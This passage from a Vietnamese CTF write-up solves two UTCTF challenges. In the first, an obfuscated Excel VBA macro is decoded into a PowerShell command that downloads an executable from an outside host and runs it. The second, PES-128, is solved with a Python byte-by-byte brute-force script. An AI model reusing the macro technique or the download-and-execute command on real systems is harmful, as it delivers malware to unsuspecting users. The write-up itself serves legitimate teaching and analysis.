qe32cd94f940ea527cf84654613d4fb5d + "t.We" End If If Sheets("Sheet2").Range("O17").Value = "Q8z4cV/f" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bCli" End If If Sheets("Sheet2").Range("Y50").Value = "OML7UOYq" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "ent;" End If If Sheets("Sheet2").Range("P41").Value = "bG9LxJvN" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$OrA" End If If Sheets("Sheet2").Range("L58").Value = "qK02fT5b" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "y{$oa" End If If Sheets("Sheet2").Range("P47").Value = "hXelsG2H" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "K.Dow" End If If Sheets("Sheet2").Range("A2").Value = "RcPl3722" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "Ry.is" End If If Sheets("Sheet2").Range("G64").Value = "Kvap5Ma0" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "nload" End If If Sheets("Sheet2").Range("H76").Value = "OjgR3YGk" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "File(" End If f = t53df028c67b2f07f1069866e345c8b85 + qe32cd94f940ea527cf84654613d4fb5d + e5b138e644d624905ca8d47c3b8a2cf41 + tfd753b886f3bd1f6da1a84488dee93f9 + z92ea38976d53e8b557cd5bbc2cd3e0f8 + xc6fd40b407cb3aac0d068f54af14362e Retval = Shell(f, 0) Dim URL As String URL = "https://www.youtube.com/watch?v=mYiBdMnIT88" ActiveWorkbook.FollowHyperlink URL End Sub ``` * Có một số trang ẩn với rất nhiều dữ liệu ngẫu nhiên trong các ô. Macro này dường như đang kiểm tra các ô cụ thể và điền dữ liệu vào các phần khác nhau của một chuỗi. Mình sẽ check từng ô riêng lẻ và ghép chuỗi lại ta được chuỗi `f` như sau ``` poWeRsHELL -command "$oaK = new-object Net.WebClient; $OrA = 'http://fruit.gang/malware'; $CNTA = 'banANA-Hakrz09182afd4'; $jri=$env:public+'\'+$CNTA+'.exe'; try{$oaK.DownloadFile($OrA, $jri);Invoke-Item $jri;break;} catch {}" ``` * Nhìn đề bài thì có nói rằng tên file đang cố được download là flag vói format `utflag{...}` vậy nên flag ở đây sẽ là `utflag{banANA-Hakrz09182afd4}` > utflag{banANA-Hakrz09182afd4} ### 3. PES-128 * Ta được 2 file 1 file bin và 1 file flag.enc. Như tiêu đề chall đã nói bài này sẽ được mã hóa PES thì đầu tiên ta được file flag.enc là một chuỗi hex * Có lẽ đây là flag output của ta sau khi mã hóa. Ta thấy rằng đầu vào cần phải là hex và byte đầu tiên luôn là byte đầu tiên của Input là `75`. Giả định rằng nó hoạt động giống như các dạng mã hóa tương tự khác nơi byte đầu tiên không thay đổi chúng ta có thể thử từng bước convert để lấy flag ban đầu ``` import subprocess encrypted_flag = "75ac713a945e9f78f657b735b7e1913cdece53b8853f3a7daade83b319c49139f8f655b0b77b" def get_encrypted_output(input_hex): result = subprocess.run(['./PES'], input=input_hex, text=True, capture_output=True) output = result.stdout.strip().split('\n')[-1] return output def brute_force_decrypt(encrypted_flag): partial_input = '' for i in range(0, len(encrypted_flag), 2): for j in range(256): trial_input = partial_input + f"{j:02x}" trial_output = get_encrypted_output(trial_input) if encrypted_flag.startswith(trial_output): partial_input = trial_input print(f"Match found: {partial_input} -> {trial_output}") break return partial_input decrypted_flag = brute_force_decrypt(encrypted_flag) print({decrypted_flag}) ``` * Kết quả chỉ cần convert chuỗi hex sang char > utflag{i_got_the_need_for_amdahls_law}